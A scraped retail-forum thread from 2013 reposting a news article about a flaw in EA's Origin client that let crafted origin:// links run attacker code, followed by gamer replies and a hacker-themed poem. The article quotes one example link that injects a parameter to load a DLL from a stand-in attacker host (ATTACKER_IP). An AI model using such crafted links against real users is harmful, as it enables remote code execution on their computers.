Industrial Deals Beauty STEM nav_sap_plcc_ascpsc Starting at $39.99 Grocery Handmade Wedding Rustic Decor Home Gift Guide Off to College Home Gift Guide Book House Cleaning _baw _baw _baw  Introducing Echo Show Limited-time offer: All-New Fire HD 8 Kids Edition, starting at $99.99 Kindle Oasis Trade it in. Fund the next. Water Sports STEMClubToys17_gno
Customer Discussions > Video Games forum

Bug in EA's Origin platform allows attackers to hijack player PCs

Sort: Oldest first | Newest first
Showing 1-13 of 13 posts in this discussion
Initial post: Mar 18, 2013, 2:22:26 PM PDT
McAwesomeo says:

Millions could be at risk of exploits that use Origin to execute malicious code.

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start games remotely. By modifying the variables in the underlying URI links, the commands to start a game can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installed Crysis 3 and a variety of other games. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.

EA representatives didn't respond to an e-mail seeking comment for this post.

I don't think anyone on the VGF will be impacted by this, but news is news.

Posted on Mar 18, 2013, 2:27:18 PM PDT
So would the headline "EA murders infant" be helpful or harmful for the company at this point?

In reply to an earlier post on Mar 18, 2013, 2:28:44 PM PDT
Good thing I have Steam instead or Origin.

Posted on Mar 18, 2013, 2:30:34 PM PDT
Uncle Ulty says:
So what do I do to make sure I am not affected? I would just get rid of Origin altogether but then I wouldn't be able to play Dragon Age anymore.

In reply to an earlier post on Mar 18, 2013, 2:30:34 PM PDT
McAwesomeo says:
The article points out Steam had an almost identical problem.

In reply to an earlier post on Mar 18, 2013, 2:32:11 PM PDT
When did it? I got Steam around Halloween, just to play TF2 for free.

In reply to an earlier post on Mar 18, 2013, 2:35:42 PM PDT
McAwesomeo says:
October. But you can avoid it by simply not launching steam-based games from the internet. Just launch them from the steam program itself. Steam is also fairly proactive about fixing problems like this, it wouldn't surprise me to find out it had been fixed not long after going public.

In reply to an earlier post on Mar 18, 2013, 3:09:26 PM PDT
This article really confused launching these games from the internet a common thing? I didn;t even know it was possible.

Posted on Mar 18, 2013, 3:15:47 PM PDT
Press play, prepare as history is made:
"largest hack in one day," all the headlines will say.

All out of time, hear the chime from the buzzer.
Found this bug on my own, no need for a fuzzer.

"It's already too late," spreading as we planned.
No need for the NO OPs, I know just where to land.

Clearing out the registers, with pointers to my functions,
loaded to your memory and writing new instructions.

Braindump i/o, siphoned out the eye holes;
enticed so i'm digging through the disassembled byte code.

Push pop change order stack frame FILO
filesystem inodes, all fall to my flow.

Running over, there again i go:
self-propagation engine, polymorphic sideshow.

Every network, we're found to get around...
the exploit payload encoded in this sound.

In reply to an earlier post on Mar 18, 2013, 3:27:20 PM PDT
Ah, I downloaded Steam to my computer and launched TF2 from the program itself.

Posted on Mar 18, 2013, 3:40:49 PM PDT
Modern Bear says:
The sad thing is that they didn't bother to check to see if they were also vulnerable to this exploit when it happened to Steam 5 months ago, or they did and failed to find it. It makes me wonder if EA can do anything right.

In reply to an earlier post on Mar 18, 2013, 4:17:06 PM PDT
McAwesomeo says:
Not that I'm aware of. I didn't even know it was possible in Steam until the exploit was made public. As for Origin? I'm not sure how that's handled. I haven't had that on my system since I got Mass Effect 2 for free for buying Dragon Age 2 at release. I didn't even bother installing it on my new PC.

In reply to an earlier post on Mar 18, 2013, 4:28:54 PM PDT
It's EA, you know, they want micro-transactions in every game they publish.
‹ Previous 1 Next ›
[Add comment]
Add your own message to the discussion
To insert a product link use the format: [[ASIN:ASIN product-title]] (What's this?)
Prompts for sign-in

Recent discussions in the Video Games forum

  Discussion Replies Latest Post
Destiny1.5 VGF Clan v10.0/ 2429 4 minutes ago
OT: What's the difference between 'The Left' tearing down Confederate statutes and ISIS tearing down Historical statutes? 12 15 minutes ago
No more Prime Discount (for up to 2 weeks after release)? 10 15 minutes ago
The List Of Single Player Games You Over Killed 20 25 minutes ago
A List Of Xbox One X Enhanced Games 20 54 minutes ago
I've been playing the NBA Live 18 Demo &... 37 1 hour ago
OT: FLashlights 6 1 hour ago
How 'Spider-Man,' the PlayStation 4 and Electronics Have Pushed Sony's Stock to Nine-Year Highs 16 1 hour ago
Dark Souls 3 DLC 36 1 hour ago
Battlegrounds Xbox One news: PlayerUnknown fans get update following Xbox One X reveal 1 1 hour ago
Trump supporters, try to be honest and let us know how excited this weekend's murder made you? 67 1 hour ago
Weekly & Weekend Gaming: 8/14-8/20 11 1 hour ago

This discussion

Discussion in:  Video Games forum
Participants:  6
Total posts:  13
Initial post:  Mar 18, 2013
Latest post:  Mar 18, 2013

New! Receive e-mail when new posts are made.